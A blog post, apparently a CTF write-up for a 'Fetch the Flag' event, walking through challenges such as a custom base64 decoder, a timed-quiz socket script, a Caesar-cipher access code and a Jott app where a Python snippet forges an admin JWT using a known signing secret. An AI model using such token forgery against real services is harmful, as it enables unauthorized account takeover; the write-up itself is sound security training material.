Open in app

Sign in

Write

Sign in

CTF Fetch the Flag

ValerieTafur
6 min readOct 28, 2023

--

Finders Keepers

Patch found a flag! He stored it in his home directory… should be able to keep it?

Connect with:

# Password is "userpass"
ssh -p 30723 user@challenge.ctf.games

Solution:

I connected to the machine and then I used the following command to get the flag:

Answer: flag{e4bd38e78379a5a0b29f047b91598add}

Nine-One-Sixteen

We found a vulnerability in this company’s software and we are trying to do responsible disclosure! We want to notify the organization and contact them about the security issues… can you track down their contact info?

Connect with:

Solution:

To find the organization info of the organization , we should enter to the well-knownsecurity of the page.

Link:

http://challenge.ctf.games:31512/.well-known/security.txt

Answer: flag{7b2bf7ec022acbddb0a75a362f4ce8ff}

Rusty

We heard you were a bit rusty on the basics… so here’s a small warmups challenge for you!

Here’s some code attached and its output. Can you make any sense of it?

OPhMOnVheP1hRaOa1Pmi1GrBbGm21PRaepxXOPxMeG1iOaYd1ji=

Solution:

To solve this exercise , I used the following code:

use std::fs;

const CHARSET: &[u8] = b"QWlKoxp3mT9EeRb4YzgG6rNj1OLvZ5SDfMBaXtP8JyIFVH07uh2wicdnUAC#@q";

fn main() {
    let output = "OPhMOnVheP1hRaOa1Pmi1GrBbGm21PRaepxXOPxMeG1iOaYd1ji=";

    let mut input = Vec::new();

    for &byte in output.as_bytes() {
        if byte != b'=' {
            let position = CHARSET.iter().position(|&x| x == byte).unwrap() as u32;
            for shift in (0..6).rev() {
                input.push(((position >> shift) & 1) as u8);
            }
        }
    }

    let mut output = Vec::new();

    let mut temp = 0u8;
    let mut temp_len = 0u8;

    for &bit in &input {
        temp = (temp << 1) | bit;
        temp_len += 1;
        if temp_len == 8 {
            output.push(temp);
            temp = 0;
            temp_len = 0;
        }
    }

    let out = String::from_utf8(output).unwrap();

    println!("{}", out);
}

Answer: flag{12f166cbb4a5b922bcc0adfaa164f46a}

Jott

Jott is the new hottness of productivity applications! Collaborate in real time, share notes, take notes, or don’t take notes! We’re not your manager. We’re not even a real company!

Go ahead and pentest the application and jott down whatever you find.

We’d like you to do a pretty thorough job, so we’ve outfitted you with a dev instane of the app. Please use these user level credentials to log in and perform an aunthenticated test.

Username- john_doe
Password — password123

We also gave you the dev-build of the app in the src directory for reference.

Solution:

To get the token of the website I used the following code:

import jwt

# Define the known SECRET_KEY
SECRET_KEY = "jott123!"
# Craft a token with an 'admin' role
payload = {"sub": "admin", "role": "admin"}
# Create a forged JWT token using the known SECRET_KEY
forged_token = jwt.encode(payload, SECRET_KEY, algorithm="HS256")
# Print the forged token
print(forged_token)

Then, I modified the jwt value with the value we generated:

Once, we enter as a admin we can get the flag:

Answer: flag{c7cc7fa86330cff2c09cea0055289b7e}

Quick Maths

To try and get better grades in math, I made a program that gave me timed quizzes. Funny thing is that as I got better at the questions in this test, I got worse grades on my math tests.

NOTE: Float answers are rounded to 1 decimal points.
NOTE: And here’s another twist… the answers to division questions depend on integer division or double division. I.e.,
3/5 = 0
3/5.0 = .6

Solution:

To solve this exercise, we need to use the following code:

import socket

HOST = 'challenge.ctf.games'
PORT = 32287

def solve_math_question(question):
    parts = question.split()
    num1 = float(parts[2])
    operator = parts[3]
    num2 = float(parts[4].replace('?', ''))

    if operator == '/':
        if num2.is_integer():
            return str(int(num1 // num2))
        else:
            return str(round(num1 / num2, 1))
    elif operator == '+':
        return str(round(num1 + num2, 1))
    elif operator == '-':
        return str(round(num1 - num2, 1))
    elif operator == '*':
        return str(round(num1 * num2, 1))
    else:
        return "Invalid operator"

def main():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((HOST, PORT))

        try:
            while True:
                data = s.recv(1024).decode('utf-8')

                if "Do you want to give it a chance? (Y/n):" in data:
                    s.send(b'Y\n')
                elif "What is" in data:
                    question = data.strip()
                    answer = solve_math_question(question)
                    s.send(f'{answer}\n'.encode('utf-8'))
                elif "Awesome, good luck!" in data:
                    continue
                elif "flag" in data:
                    print(data)
                    break
                else:
                    if "Wrong!" not in data:
                        print(data)
                    continue
        except KeyboardInterrupt:
            print("Interrupted. Good bye!")

if __name__ == '__main__':
    main()

Then, we run our script:

Answer: flag{77ba0346d9565e77344b9fe40ecf1369}

Back the Hawks

We are Back the Hawks! We’re a non-profit that seeks to protect hawks across the world. We have a vibrant community of Backers who are all passionate about Backing the Hawks! We’d love for you to join us… if you can figure out how to get an access code.

NOTE — any resemblence to other companies, non-profits, services, login portal challenges, and/or the like, living or dead, is completely coincidental.

Hint: The JavaScript of this page is doing something interesting.

Solution:

I exanimated the website to check the JavaScript code:

According to the javascript , I need to make a post:

Then, I got a encrypted message:

Caesar cipher:

Output: WE_OUT_HERE_BACKIN_THE_HAWKS_2023

Once, we get our access code, we can enter in the website:

Answer: flag{3ef532159716ecfb9117f56f4ead4fb6}

Unhackable Andy

Someone might want to let ol’ Andy know the old addage — pride goeth before the fall.

Solution:

To solve this exercise , we need to access to the login.

The exercise provided us the repository:

After we exanimated we can find the credential to access to the page:

Once, we access to the page , we can see a command output:

We only need to do simple Linux commands:

ls

cat flag.txt

Answer: flag{e81b8885d8a5e8d57bbadeb124cc956b}

Protecting Camp

I made a small site to keep a list of things I need to buy to keep me safe before I go camping, maybe it’s keeping some other things safe too!

Psst… Snyk can help solve this challenge! Try it out!

Solution:

We need to find the vulnerability using Synk:

Then, we checked the code:

This is the vulnerable part of the code that we are going to exploit.

Use burpsuit:

Modify the request.

Launch the request:

Answer: flag{d716dd8ab70bbc51a5f1d0182c84bcc8}

Ctf Writeup
Ctf
Cybersecurity
Cyberattack
Infosec Write Ups

--

--

ValerieTafur

Written by ValerieTafur

161 Followers

Passionate professional in Cybersecurity and Project Management.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams